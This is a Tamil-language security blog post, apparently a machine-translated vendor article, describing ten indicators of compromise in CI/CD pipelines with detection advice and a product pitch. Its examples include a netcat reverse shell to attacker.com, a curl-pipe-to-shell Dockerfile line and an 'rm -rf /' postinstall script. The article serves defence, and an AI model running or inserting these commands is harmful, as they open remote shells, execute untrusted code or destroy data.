சமரசத்தின் முதல் 10 குறிகாட்டிகள் CI/CD Pipelines

பொருளடக்கம்

கட்டாயம் படிக்க வேண்டிய பதிவுகள்

சமீபத்திய சுவாரஸ்யமான பதிவு

அறிமுகம்: இணையப் பாதுகாப்பில் ஏற்படும் பாதுகாப்பு மீறலைக் காட்டும் குறிகாட்டிகள் யாவை?

உங்கள் சிஸ்டம் அல்லது கணினியில் பாதிப்பு ஏற்படுவதற்கான முதல் எச்சரிக்கை அறிகுறிகளே அதன் குறைபாடு குறிகாட்டிகள் ஆகும். pipeline தாக்குதலுக்கு உள்ளாகலாம். எளிமையாகச் சொன்னால், சமரசத்தின் குறிகாட்டிகள் தாக்குதல் நடத்தியவர்கள் விட்டுச்சென்ற தடயங்கள், விசித்திரமானவை போல. loginகோப்பு மாற்றங்கள் அல்லது மறைக்கப்பட்ட தீம்பொருள். ஐஓசி சைபர் பாதுகாப்புஅவை, ஒரு குற்ற நிகழ்விடத்தில் காணப்படும் கைரேகைகளைப் போலச் செயல்பட்டு, ஏதோ தவறு நடந்திருக்கிறது என்பதற்கான தெளிவான ஆதாரத்தை உங்களுக்குத் தருகின்றன. எனவே, டெவலப்பர்கள் கேட்கும்போது... சமரசத்தின் அறிகுறிகள் யாவை?இதற்கான பதில் சர்வர்கள் அல்லது ஃபயர்வால்களுக்கு மட்டும் கட்டுப்பட்டதல்ல, நவீன அமைப்புகளில் மறைந்திருக்கும் அபாயங்களையும் இது உள்ளடக்கியுள்ளது. CI/CD pipelines.

இவற்றில் pipelineஅதனால், தாக்குபவர்கள் யாருக்கும் தெரியாமல் குறியீட்டைத் திருத்தலாம், தீங்கிழைக்கும் சார்புகளைச் செருகலாம் அல்லது உருவாக்கப் படிகளை மாற்றலாம். இருப்பினும், பெரும்பாலான வழிகாட்டிகள் இன்னும் சேவையகங்கள் அல்லது வலையமைப்புகளில் மட்டுமே கவனம் செலுத்துகின்றன. இதன் விளைவாக, மென்பொருள் விநியோகச் சங்கிலி மிகவும் எளிதான இலக்குகளில் ஒன்றாக மாறியுள்ளது.

அதனால்தான் சமரசத்தின் அறிகுறிகளைக் கண்டறிதல் CI/CD pipelineஇது இன்றியமையாதது. எல்லாவற்றிற்கும் மேலாக, தீம்பொருளைத் தடுக்கவும், இரகசியங்களைப் பாதுகாக்கவும், மென்பொருள் விநியோகத்தின் ஒவ்வொரு கட்டத்தையும் உறுதிப்படுத்தவும் இது குழுக்களுக்கு உதவுகிறது.

சமரசத்தின் முதல் 10 குறிகாட்டிகள் CI/CD Pipelines

பாதுகாப்பு மீறலுக்கான குறிகாட்டிகளை விளக்கும்போது, ​​பெரும்பாலான பட்டியல்கள் சேவையகங்கள் அல்லது வலையமைப்புகளில் கவனம் செலுத்துகின்றன. ஆயினும், CI/CD pipelineதாக்குதல் நடத்துபவர்கள் மிகவும் மாறுபட்ட தடயங்களை விட்டுச் செல்கின்றனர். இந்த சமிக்ஞைகளை அடையாளம் காண்பது, முன்கூட்டிய பாதுகாப்பிற்கு மிகவும் முக்கியமானது. ஒவ்வொரு டெவலப்பரும் மற்றும் பாதுகாப்புப் பொறியாளரும் கவனிக்க வேண்டிய 10 IOC சைபர் பாதுகாப்பு எச்சரிக்கை அறிகுறிகள் கீழே கொடுக்கப்பட்டுள்ளன.

1. சந்தேகத்திற்குரிய சார்புநிலை மாற்றங்கள்

சமரசத்தின் முக்கிய குறிகாட்டிகளில் ஒன்று pipeline`s` என்பது ஒரு திடீர், வழக்கத்திற்கு மாறான சார்புநிலைப் புதுப்பித்தல் ஆகும். தொகுப்பு மேலாளர்கள் மீது மென்பொருள் உருவாக்குநர்கள் வைத்துள்ள நம்பிக்கையைத் தாக்குபவர்கள் பெரும்பாலும் பயன்படுத்தி, அபாயகரமான தொகுப்புகளைச் சேர்க்கிறார்கள்.

உதாரணமாக, npm-ல் ஒரு package.json வேறுபாட்டில் திடீரென பின்வருவன அடங்கலாம்:

இதுபோன்ற மாற்றங்கள் பாதுகாப்பானதாகத் தோன்றலாம், ஆனால் அவை ஒவ்வொரு உருவாக்கத்திலும் ட்ரோஜன்மயமாக்கப்பட்ட குறியீட்டைச் செலுத்தக்கூடும்.

தாக்கம்: பாதிக்கப்பட்ட கட்டமைப்புகள் மூலத்திலேயே தீம்பொருளைப் பெறுகின்றன.

கண்டறிதல்: சார்பு மதிப்பாய்வுகளை அமல்படுத்துங்கள், லாக்ஃபைல் வேறுபாடுகளைக் கண்காணிக்கவும், புதிய தொகுப்புகளை எல்லா நேரங்களிலும் ஸ்கேன் செய்யவும்.

2. உருவாக்கங்களில் தெளிவற்ற குறியீடு 

தீம்பொருள் உருவாக்குபவர்கள் மதிப்பாய்வுகளைத் தவிர்ப்பதற்காகத் தகவல்களை மறைக்கும் உத்தியை நம்பியிருக்கிறார்கள். இதன் விளைவாக, இதில் ஏற்படும் சமரசத்தின் இந்த அறிகுறி... CI/CD pipelineஇவற்றைக் கண்டறிவது மிகவும் கடினமான ஒன்றாகும். உண்மையில், மறைக்கப்பட்ட தரவுக் கோப்புகள் பெரும்பாலும் யாருக்கும் தெரியாமல் திறந்த மூல நூலகங்கள் அல்லது கண்டெய்னர் இமேஜ்களில் ஊடுருவி விடுகின்றன.

உதாரணமாக:

  • ஒரு PyPI தொகுப்பைப் பயன்படுத்தி base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • தேவையற்ற UPX பைனரிகள் நிரப்பப்பட்ட ஒரு டாக்கர் இமேஜ்.
  • ஜாவாஸ்கிரிப்ட் நிரம்பிய \x41\x42 அடையாளத் திருடர்களிடமிருந்து ஒளிந்துகொண்டு தப்பிக்கிறார்.

தாக்கம்: மறைக்கப்பட்ட குறியீடு, உருவாக்கத்தின்போதோ அல்லது இயக்க நேரத்திலோ அமைதியாகச் செயல்படுவதால், இது IOC இணையப் பாதுகாப்பில் ஒரு முக்கியமான சமிக்ஞையாக அமைகிறது.
கண்டறிதல்: இணைக்க SAST தீம்பொருள் ஸ்கேனிங் மூலம் குறியாக்கம் செய்யப்பட்ட அல்லது தொகுக்கப்பட்ட குறியீட்டைக் கண்டறிய வேண்டும். எல்லாவற்றிற்கும் மேலாக, குறியீட்டைக் குழப்புவதை மேலும் விசாரணைக்கு உட்படுத்த வேண்டிய ஒரு எச்சரிக்கை அறிகுறியாகக் கருத வேண்டும்.

3. Git-இல் அம்பலமான இரகசியங்கள்: ஒரு செவ்வியல் IOC இணையப் பாதுகாப்பு அபாயம்

CI/CD pipelineகள் பெரும்பாலும் களஞ்சியங்களிலிருந்து நேரடியாக இரகசியங்களைப் பெறுகின்றன. இருப்பினும், Git-இல் இரகசியங்கள் தோன்றும் போதுஅவை, “சமரசத்தின் குறிகாட்டிகள் யாவை?” என்ற கேள்விக்கு மிகத் தெளிவான பதில்களில் ஒன்றாக அமைகின்றன. pipelineஒருமுறை நற்சான்றிதழ்கள் Git-இல் பதிவேற்றப்பட்டுவிட்டால், தாக்குபவர்கள் அவற்றை வரம்பின்றிப் பயன்படுத்திக்கொள்ளலாம்.

உதாரணமாக:

  • A .env கொண்ட கோப்பு AWS_SECRET_KEY=.
  • டோக்கன்கள் உள்ளே தள்ளப்பட்டன config.json.
  • நீக்கப்பட்ட பிறகும் Git ஹிஸ்டரியில் இரகசியங்கள் தென்படுகின்றன.

தாக்கம்: வெளிப்படுத்தப்பட்ட சாவிகள் தாக்குபவர்களுக்கு நேரடி அணுகலை அளிக்கின்றன. CI/CD pipelineகிளவுட் அமைப்புகள் அல்லது தரவுத்தளங்கள். எனவே, இது பாதுகாப்பு மீறப்பட்டதற்கான மிகவும் ஆபத்தான குறிகாட்டிகளில் ஒன்றாகும்.
கண்டறிதல்: பயன்பாட்டு pre-commit hooks மேலும், இரகசியங்களை ஸ்கேன் செய்வதற்கான CI பணிகளை மேற்கொண்டு, கசிந்த சாவிகளை உடனடியாக ரத்து செய்யவும். கூடுதலாக, பாதிப்பு ஏற்படும் கால அளவைக் குறைக்க, தானியங்கு சரிசெய்தலை அமல்படுத்தவும்.

4. சேதப்படுத்தப்பட்டது Pipeline உள்ளமைவுகள்: சமரசத்தின் மறைக்கப்பட்ட குறிகாட்டிகள்

Pipeline உள்ளமைவுகள் உயர் மதிப்பு வாய்ந்த இலக்குகளாக இருப்பதற்குக் காரணம் ஒரே ஒரு மாற்றம் பெரும்பாலும் முழு பணி ஓட்டத்தையும் சீர்குலைத்துவிடுகிறது.அதன் விளைவாக, சேதப்படுத்தப்பட்டது pipeline கோப்புகள் என்பவை, பாரம்பரிய கண்காணிப்புக் கருவிகள் அரிதாகவே கண்டறியும் ஒரு முக்கிய IOC இணையப் பாதுகாப்பு அபாயமாகும்.

உதாரணமாக:

  • GitHub செயல்பாடுகளில்:

  • GitLab-இல்: ஒரு தீங்கிழைக்கும் பணி சேர்க்கப்பட்டது .gitlab-ci.yml அது முக்கியமான தரவுகளைக் கொட்டிவிடுகிறது.
  • ஜென்கின்ஸில்: sh "nc -e /bin/bash attacker.com 4444".

தாக்கம்: இந்த அங்கீகரிக்கப்படாத மாற்றங்கள் உங்கள் pipeline தாக்குதல் நடத்துபவர்களுக்கான ஒரு நிரந்தரப் பின்கதவாக இது அமைவது, பாதுகாப்பு மீறப்பட்டதற்கான ஒரு தெளிவான அறிகுறியாகும்.
கண்டறிதல்: கையொப்பமிடப்பட்ட உள்ளமைவுகளை அமல்படுத்துங்கள், PR ஒப்புதல்களைக் கட்டாயமாக்குங்கள், மற்றும் எதிர்பாராத பணிகளைக் கண்காணிக்கவும். கூடுதலாக, அமைக்கவும் guardrails மாற்றப்பட்ட பணிப்பாய்வுகளைத் தானாகவே தடுக்கும்.

5. சலுகை பெற்ற IaC இயல்புநிலைக்கு 

தவறாக உள்ளமைக்கப்பட்ட உள்கட்டமைப்பு வரையறைகள் பெரும்பாலும் மறைவான பின்கதவுகளை உருவாக்குகின்றன. இதன் விளைவாக, சிறப்புரிமை பெற்ற இயல்புநிலைகள் IaC இவை ஐஓசி-யின் ஒரு பொதுவான இணையப் பாதுகாப்பு அபாயமாகும்.

உதாரணமாக:

  • பாட்களை வழங்கும் ஒரு குபெர்னெட்டஸ் வரிசைப்படுத்தல் privileged: true.
  • ஹெல்ம் விளக்கப்படங்கள் சேவைகளை அம்பலப்படுத்துகின்றன 0.0.0.0:22.

தாக்கம்: தாக்குதல் நடத்துபவர்கள் ரூட்-லெவல் அணுகலைப் பெறுகிறார்கள் அல்லது உள் சேவைகளைப் பொதுவெளியில் அம்பலப்படுத்துகிறார்கள். இதன் விளைவாக, இந்தச் சிக்கல்கள் தாக்குதலுக்கான வாய்ப்பை கணிசமாக விரிவுபடுத்துகின்றன.
கண்டறிதல்: விண்ணப்பிக்க IaC இணைப்பதற்கு முன் குறைந்தபட்ச சிறப்புரிமையை அமல்படுத்த ஸ்கேன் செய்யவும். மேலும், ஒவ்வொரு உள்ளமைவும் மதிப்பாய்வு செய்யப்படுவதை உறுதிசெய்யவும். pipeline.

6. அசாதாரணமான கட்டமைப்பு நடத்தைகள் 

தாக்குபவர்கள் அடிக்கடி மாறுகிறார்கள் pipeline தீங்கிழைக்கும் செயல்களில் ஈடுபடுவதற்கான நடத்தை. வேறுவிதமாகக் கூறினால், சமரசத்தின் குறிகாட்டிகள் யாவை என்பதற்கான மிகத் தெளிவான பதில்களில் ஒன்று அசாதாரணமான கட்டமைப்புச் செயல்பாடு ஆகும். CI/CD pipelines.

உதாரணமாக:

  • அறிமுகமில்லாத டொமைன்களுக்கு வெளிச்செல்லும் நெட்வொர்க் கோரிக்கைகளை உருவாக்கும் கட்டமைப்புகள்.
  • ஒரு Node.js ப்ராஜெக்ட் திடீரென PowerShell-ஐத் தோற்றுவிக்கும்போது npm install.
  • பில்ட் ஸ்கிரிப்ட்களில் வரையறுக்கப்படாத பெரிய பைனரிகளைப் பதிவிறக்கும் ஒரு CI பணி.

தாக்கம்: பாதிக்கப்பட்ட கட்டமைப்புகள் தீம்பொருள் விநியோக மையங்களாகச் செயல்படக்கூடும். எல்லாவற்றிற்கும் மேலாக, அவை ஒவ்வொரு நிறுவலிலும் தீங்கிழைக்கும் மென்பொருட்களைப் பரப்புகின்றன.
கண்டறிதல்: எதிர்பாராத செயல்முறைகள் அல்லது இணைப்புகளுக்காக உருவாக்கப் பதிவுகளைக் கண்காணிக்கவும். மேலும், இயல்புக்கு மாறான நடத்தைகளைக் கொடியிட, முரண்பாடு கண்டறிதலை உள்ளமைக்கவும்.

7. IOC சைபர் பாதுகாப்பு அபாயங்களாக தீங்கிழைக்கும் தொகுப்பு ஸ்கிரிப்டுகள்

தொகுப்பு மேலாளர்கள் வாழ்க்கைச் சுழற்சியை ஆதரிக்கின்றனர். hooks தாக்குதல் நடத்துபவர்கள் அதைப் பயன்படுத்திக் கொள்கிறார்கள். எனவே, npm, PyPI, அல்லது Dockerfiles-இல் உள்ள தீங்கிழைக்கும் ஸ்கிரிப்டுகள், பாதுகாப்பு மீறப்பட்டதற்கான வலுவான அறிகுறிகளாகும்.

உதாரணமாக:

  • npm: postinstall ஸ்கிரிப்ட் இயங்குகிறது rm -rf / அல்லது C2-க்கு சமிக்ஞை அனுப்புதல்.
  • பைபிஐ: setup.py நிறுவலின் போது மறைக்கப்பட்ட பைதான் குறியீடு செயல்படுத்தப்படுகிறது.
  • டாக்கர்ஃபைல்: RUN curl attacker.sh | sh.

தாக்கம்: இந்தத் தாக்குதல், எந்தவொரு இயக்க நேரச் சோதனைக்கும் முன்பாக, நிறுவலின் போதே செயல்படுத்தப்படுகிறது. இதன் விளைவாக, காலம் கடந்துவிடும் வரை உருவாக்குநர்கள் இதைக் கவனிக்காமலும் போகலாம்.
கண்டறிதல்: நிறுவல் ஸ்கிரிப்டுகளுக்காக தொகுப்பு அறிக்கைகளை ஆய்வு செய்யவும். மேலும், அபாயகரமானவற்றைக் கட்டுப்படுத்தவும். hooks in CI/CD பாதிப்பைக் குறைப்பதற்கான பணிகள்.

8. பதிவக நச்சுத்தன்மை சமரசக் குறிகாட்டிகள்

தாக்குதல் நடத்துபவர்கள் பதிவகங்களில் உள்ள ஆவணங்களை மாற்றி அமைக்கின்றனர், மேலும் இந்த நிகழ்வுகள் விநியோகச் சங்கிலியில் ஏற்படும் சமரசத்தின் குறிகாட்டிகளுக்கு சிறந்த எடுத்துக்காட்டுகளாகும். pipelines.

உதாரணமாக:

  • ஒரு ட்ரோஜன் ஊடுருவல் அடுக்குடன், டாக்கர் இமேஜ் டேக் ஒன்று யாருக்கும் தெரியாமல் புதுப்பிக்கப்பட்டது.
  • உள்ளகத் தொகுப்பு ஒன்று, நச்சுத்தன்மையுள்ள பதிப்பால் மாற்றப்பட்டது.
  • npm நேம்ஸ்பேஸ் ஆக்கிரமிப்பு, அதாவது lodash-proxy.

தாக்கம்: ரெஜிஸ்ட்ரி ஆர்டிஃபேக்டைப் பயன்படுத்தும் ஒவ்வொரு உருவாக்கமும் பாதிப்புக்குள்ளாகிறது. அதுமட்டுமின்றி, அந்தப் பாதிப்பு கீழ்நிலை சேவைகளுக்கும் பரவுகிறது.
கண்டறிதல்: அனைத்து ரெஜிஸ்ட்ரி இழுப்புகளிலும் கையொப்பம் மற்றும் ஒருமைப்பாட்டுச் சோதனைகளை அமல்படுத்துங்கள். கூடுதலாக, ஆர்டிஃபேக்ட் மூலத்தை இதனுடன் கண்காணிக்கவும். SBOM சரிபார்த்தல்.

9. IOC சான்றாக இயல்புக்கு மாறான பயனர் செயல்பாடு

சமரசம் செய்யப்பட்ட கணக்குகள் பெரும்பாலும் இயல்புக்கு மாறான தடயங்களை விட்டுச் செல்கின்றன. அதன்படி, டெவலப்பரின் அசாதாரண நடத்தை என்பது சமரசத்தின் ஒரு வலுவான அறிகுறியாகும்.

உதாரணமாக:

  • Commitஉள்ளூர் நேரப்படி அதிகாலை 3 மணிக்குத் தள்ளப்பட்டது.
  • விடுமுறையில் உள்ள கணக்குகளின் PR ஒப்புதல்கள்.
  • Pipelines அசாதாரணமான அதிர்வெண்ணுடன் தூண்டப்படுகிறது.

தாக்கம்: தாக்குதல் நடத்துபவர்கள் திருடப்பட்ட சான்றுகளைத் தவறாகப் பயன்படுத்தி தீங்கிழைக்கும் மாற்றங்களைச் செருகுகிறார்கள். எல்லாவற்றிற்கும் மேலாக, அங்கீகரிக்கப்படாத commitகள் சாதாரண பணிப்பாய்வுகளில் எளிதாகக் கலந்துவிடுகின்றன.
கண்டறிதல்: மானிட்டர் SCM முறைகேடுகளைக் கண்டறிய நடவடிக்கை எடுக்கவும், MFA-ஐ அமல்படுத்தவும், டோக்கன்களைத் தவறாமல் சுழற்றவும். மேலும், சந்தேகத்திற்கிடமானவை குறித்து எச்சரிக்கை செய்யவும். commit அல்லது ஒப்புதல் முறைகள்.

10. IOC சைபர் பாதுகாப்பில் நம்பகத்தன்மை அல்லது கையொப்பச் சோதனைகளில் தோல்வி.

பொதுவான ஆனால் புறக்கணிக்கப்பட்ட சமரசத்தின் அறிகுறி ஒரு தோல்வியுற்ற நம்பகத்தன்மை அல்லது கையொப்பச் சரிபார்ப்பு. IOC சைபர் பாதுகாப்பில், இந்தக் குறியீடுகள் அல்லது ஆவணங்கள் உண்மையானவையா என்பதை இந்தச் சோதனைகள் சரிபார்க்கின்றன. இவற்றைத் தவிர்ப்பது பின்வரும் விளைவை ஏற்படுத்தும்: pipelineஅம்பலப்படுத்தப்பட்டது.

எடுத்துக்காட்டுகள்:

  • எதிர்பார்க்கப்பட்ட சரிபார்ப்புத்தொகையுடன் பொருந்தாத ஒரு SHA256 ஹாஷ்.
  • விடுபட்ட அல்லது செல்லாத GPG கையொப்பம்.
  • An SBOM கையொப்பமிடப்படாத கலைப்பொருட்களைக் காண்பிக்கிறது.

தாக்கம்: ஒருமைப்பாட்டுக் குறைபாடுகள் பெரும்பாலும் முறைகேடு, ரெஜிஸ்ட்ரி நச்சுத்தன்மை அல்லது தீம்பொருள் ஊடுருவல் ஆகியவற்றைக் குறிக்கின்றன.

கண்டறிதல்: கையொப்பச் சோதனைகளைத் தானியங்குபடுத்துங்கள், சரிபார்ப்புத்தொகை சரிபார்ப்பை அமல்படுத்துங்கள், மற்றும் கையொப்பமிடப்படாத கூறுகளைத் தடுங்கள். எல்லாவற்றிற்கும் மேலாக, தோல்வியுறும் ஒவ்வொரு சோதனையையும், அது முறைகேடாகப் பயன்படுத்தப்பட்டதற்கான தெளிவான சான்றாகக் கருதுங்கள்.

CI/CD சமரசத்தின் அறிகுறிகள் ஒரு பார்வையில்

சமரசக் காட்டி (IOC) தாக்கம் CI/CD Pipelines எப்படி கண்டறிவது
சந்தேகத்திற்கிடமான சார்பு மாற்றங்கள் தாக்குதல் நடத்துபவர்கள் தொகுப்பு மேலாளர்களில் தீங்கிழைக்கும் லைப்ரரிகளைச் செலுத்துவதால், உருவாக்கக் கட்டமைப்புகள் (builds) பாதிக்கப்படுகின்றன. லாக்ஃபைல் வேறுபாடுகளைக் கண்காணிக்கவும், சார்புநிலை மதிப்பாய்வுகளை அமல்படுத்தவும், சார்புநிலைகளைத் தொடர்ந்து ஸ்கேன் செய்யவும்.
பில்ட்களில் தெளிவற்ற குறியீடு மறைக்கப்பட்ட தரவுப் பொதிகள், உருவாக்கங்களின்போதோ அல்லது இயக்க நேரத்திலோ கண்டறியப்படாமல் செயல்படுத்தப்படுகின்றன. பயன்பாட்டு SAST மேலும், பேஸ்64, ஹெக்ஸ் அல்லது பேக்டு கோட் பேட்டர்ன்களைக் கண்டறிய தீம்பொருள் ஸ்கேனிங்.
Git-இல் இரகசியங்கள் அம்பலமாயின கசிந்த டோக்கன்கள் அல்லது ஏபிஐ திறவிகள், தாக்குதல் நடத்துபவர்களுக்கு முக்கிய அமைப்புகளுக்கு நேரடி அணுகலை வழங்குகின்றன. Git-இல் இரகசிய ஸ்கேன்களை இயக்கவும் hooks மேலும், கசிந்த சான்றுகளைத் தானாகவே ரத்து செய்யவும்.
சேதப்படுத்தப்பட்டது Pipeline கட்டமைப்புகளில் மாற்றியமைக்கப்பட்ட பணிப்பாய்வுகள், தரவு வெளியேற்றம் அல்லது நிலைத்தன்மையை உள்ளேயே அனுமதிக்கின்றன. CI/CD. PR ஒப்புதல்களைக் கோருங்கள், கையொப்பமிடப்பட்ட உள்ளமைவுகளை அமல்படுத்துங்கள், மற்றும் கண்காணிக்கவும். pipeline மாற்றங்கள்.
சலுகை IaC இயல்புநிலைக்கு அளவுக்கு மீறிய தாராளமான கட்டுப்பாடுகள் அல்லது பாதுகாப்பற்ற இயல்புநிலைகள் கிளவுட் சூழல்களைப் பாதிப்புக்குள்ளாக்குகின்றன. குறைந்தபட்ச சிறப்புரிமை அமலாக்கத்திற்காக Terraform, Kubernetes மற்றும் Helm கோப்புகளை ஸ்கேன் செய்யவும்.
அசாதாரண கட்டுமான நடத்தைகள் Pipelineதீம்பொருள் விநியோக மையங்களாக அல்லது பக்கவாட்டு நகர்விற்காகப் பயன்படுத்தப்படுகின்றன. எதிர்பாராத பதிவிறக்கங்கள், செயல்முறைகள் அல்லது வெளிச்செல்லும் அழைப்புகளுக்காக உருவாக்கப் பதிவுகளைப் பகுப்பாய்வு செய்யவும்.
தீங்கிழைக்கும் தொகுப்பு ஸ்கிரிப்டுகள் மறைக்கப்பட்ட நிறுவலுக்கு முந்தைய/பிந்தைய ஸ்கிரிப்டுகள், இயக்க நேரச் சோதனைக்கு முன்பாக பேலோடுகளைத் தூண்டுகின்றன. ஆபத்தான npm/PyPI ஸ்கிரிப்டுகளைத் தடுத்து, அவற்றின் செயல்பாட்டைக் கட்டுப்படுத்துங்கள். CI/CD வேலைகள்.
பதிவேடு நச்சுத்தன்மை ட்ரோஜன் தாக்கப்பட்ட கலைப்பொருட்கள், பதிவகங்களில் உள்ள நம்பகமான படிமங்கள் அல்லது பைனரிகளை இடம்பெயர்க்கின்றன. சரிபார்ப்புத்தொகைகளைச் சரிபார்த்து, கையொப்பச் சரிபார்ப்பை அமல்படுத்தி, பதிவகங்களை முன்கூட்டியே ஆய்வு செய்யுங்கள்.
அசாதாரண பயனர் செயல்பாடு சமரசம் செய்யப்பட்ட கணக்குகள் தீங்கிழைக்கும் செயல்களைத் தூண்டுகின்றன. commitகள் அல்லது தூண்டுதல் pipelines. MFA-ஐ அமல்படுத்துங்கள், கண்காணிக்கவும் commitமுரண்பாடுகளைக் கண்டறிந்து, பகுப்பாய்வு செய்யவும். login வடிவங்கள்.
நம்பகத்தன்மை அல்லது கையொப்பச் சோதனைகளில் தோல்வி மாற்றப்பட்ட குறியீடு, சார்புநிலைகள் அல்லது படங்கள் உள்ளே நுழைவதைக் குறிக்கிறது. pipeline. ஒருமைப்பாட்டுச் சோதனைகளைத் தானியங்குபடுத்துங்கள் மற்றும் கையொப்பமிடப்படாத அல்லது பொருந்தாத கூறுகளைத் தடுங்கள்.

பாரம்பரிய IOC இணையப் பாதுகாப்பு ஏன் தோல்வியடைகிறது CI/CD அபாயங்கள்

பெரும்பாலான நிறுவனங்கள் ஏற்கனவே சர்வர்கள், கணினிகள் அல்லது நெட்வொர்க்குகளில் ஏற்படும் பாதுகாப்பு மீறல்களின் குறிகாட்டிகளைக் கண்காணிக்கின்றன. இருப்பினும், IOC சைபர் பாதுகாப்பிற்கான இந்த பாரம்பரிய அணுகுமுறை புறக்கணிக்கிறது CI/CD pipelineகள், இப்போது மிகவும் முக்கியமான தாக்குதல் பரப்புகளில் ஒன்றாக இருக்கின்றன. உண்மையில், pipelineபாரம்பரிய கருவிகளால் கண்டறிய முடியாத தனித்துவமான சமரச சமிக்ஞைகளை இவை காட்டுகின்றன.

பாரம்பரிய பாதுகாப்பில் சமரசத்தின் குறிகாட்டிகள்

வழக்கமான IOC இணையப் பாதுகாப்பில், கவனம் பொதுவாக பின்வருவனவற்றில் செலுத்தப்படுகிறது:

  • வழக்கத்திற்கு மாறான loginதிருடப்பட்ட சான்றுகளைச் சுட்டிக்காட்டும் s அல்லது IP முகவரிகள்.
  • தீம்பொருளை வெளிப்படுத்தும் சந்தேகத்திற்கிடமான கோப்பு ஹாஷ்கள் அல்லது ரெஜிஸ்ட்ரி மாற்றங்கள்.
  • தரவுக் கசிவைச் சுட்டிக்காட்டும் எதிர்பாராத வெளிச்செல்லும் தரவுப் போக்குவரத்து.

இவை நன்கு அறியப்பட்ட குறிகாட்டிகள் ஆகும், மேலும் இவை கண்காணிக்கப்படுகின்றன. MITER ATT&CK கட்டமைப்புஇது, எதிரிகளின் பொதுவான நடத்தைகளையும் தந்திரங்களையும் வரைபடமாக்குகிறது. இவை பயனுள்ள சமிக்ஞைகள். இருப்பினும், இவை முக்கியமாக இயக்க முறைமைகள் அல்லது பெருநிறுவன வலையமைப்புகளுக்கு மட்டுமே பொருந்தும். இதன் விளைவாக, மென்பொருள் விநியோகச் சங்கிலியின் ஆரம்ப கட்டங்களில் நிகழும் நுட்பமான முறைகேடுகளை இவை கண்டறியத் தவறுகின்றன.

ஏன் CI/CD Pipelineகள் வேறுபட்டவை

CI/CD pipelineகள் என்பவை டெவலப்பர்கள் பணிபுரியும் தானியங்கு சூழல்கள் ஆகும். commit குறியீட்டை எழுதி, சார்புநிலைகளைப் பெற்று, உருவாக்கங்களை வெளியிடவும். இதில் ஏற்படும் ஒரு சிறிய சமரசம், மற்ற எல்லா வெளியீடுகளிலும் பாதிப்பை ஏற்படுத்தும் என்பதைத் தாக்குபவர்கள் அறிவார்கள். அதன்படி, சமரசத்தின் அறிகுறிகள் யாவை? CI/CD pipelineம்? அவை மிகவும் வித்தியாசமாகத் தெரிகின்றன:

  • package.json அல்லது requirements.txt கோப்பில் தீங்கிழைக்கும் சார்புநிலை ஒன்று யாருக்கும் தெரியாமல் சேர்க்கப்பட்டுள்ளது.
  • Git-இல் வெளிப்படுத்தப்படும் API விசைகள் அல்லது டோக்கன்கள் commits அல்லது .env கோப்புகள்.
  • npm அல்லது PyPI தொகுப்புகளில் புகுத்தப்பட்ட தெளிவற்ற குறியீடு.
  • privileged: true போன்ற பாதுகாப்பற்ற இயல்புநிலைகளைக் கொண்ட Terraform அல்லது Kubernetes கோப்புகள்.
  • Pipeline தரவுகளைத் திருடுவதற்கோ அல்லது மறைமுக வழிகளைத் திறப்பதற்கோ பணிகள் திருத்தப்பட்டுள்ளன.

இந்த சமரச சமிக்ஞைகள் CI/CD கண்ணுக்குப் புலப்படாமல் இருங்கள் standard பாதுகாப்பு கருவிகள்.

ஐஓசி சைபர் பாதுகாப்பில் உள்ள இடைவெளி

பல குழுக்கள் பாதுகாப்பு மீறலுக்கான குறிகாட்டிகளின் மதிப்பைப் புரிந்துகொண்டாலும், அவை இன்னும் சர்வர்கள் மற்றும் நெட்வொர்க் பதிவுகளிலிருந்து கண்டறிவதை மட்டுமே சார்ந்துள்ளன. எனவே, தாக்குதல் நடத்துபவர்கள் வழக்கமான தடயங்களை விட்டுச் செல்லாமல், பில்டுகளை விஷமாக்கவோ அல்லது தீம்பொருளைச் செருகவோ முடியும். இதனால்தான் XZ Utils பேக்டோர் அல்லது தீங்கிழைக்கும் npm தொகுப்புகள் போன்ற சம்பவங்கள், அவை உற்பத்தி நிலையை அடையும் வரை கண்டறியப்படாமல் இருந்தன.

இவ்வகையான விநியோகச் சங்கிலி சமரசங்கள் பின்வருவனவற்றாலும் எடுத்துக்காட்டப்படுகின்றன: CISA-யின் விநியோகச் சங்கிலி பாதுகாப்பு வழிகாட்டுதல்தாக்குதல் நடத்துபவர்கள் பெருகிய முறையில் குறிவைக்கிறார்கள் என்று எச்சரிக்கிறது. CI/CD pipelineமற்றும் பதிவேடுகள்.

எடுத்துக்கொள்ளுங்கள்

பாரம்பரிய IOC சைபர் பாதுகாப்பு அவசியமானது, ஆனால் அது மட்டும் போதுமானதல்ல. எல்லாவற்றிற்கும் மேலாக, குழுக்கள் குறிப்பிட்ட பாதுகாப்பு மீறலுக்கான குறிகாட்டிகளை அடையாளம் காண வேண்டும். CI/CD pipelines. அப்போதுதான் அவர்களால் தீங்கிழைக்கும் குறியீட்டைக் கண்டறிய முடியும் அல்லது pipeline தவறான பயன்பாடு சூழல்கள் முழுவதும் பரவுவதற்கு முன்பே அதைத் தவறாகப் பயன்படுத்துங்கள்.

sca-tools-software-composition-analysis-tools
உங்கள் மென்பொருள் அபாயங்களுக்கு முன்னுரிமை அளித்து, சரிசெய்து, பாதுகாக்கவும்.
உங்கள் இலவச கணக்கைப் பெறுங்கள்.
கடன் அட்டை தேவையில்லை.

உங்கள் மென்பொருள் உருவாக்கம் மற்றும் விநியோகத்தைப் பாதுகாக்கவும்

Xygeni தயாரிப்பு தொகுப்புடன்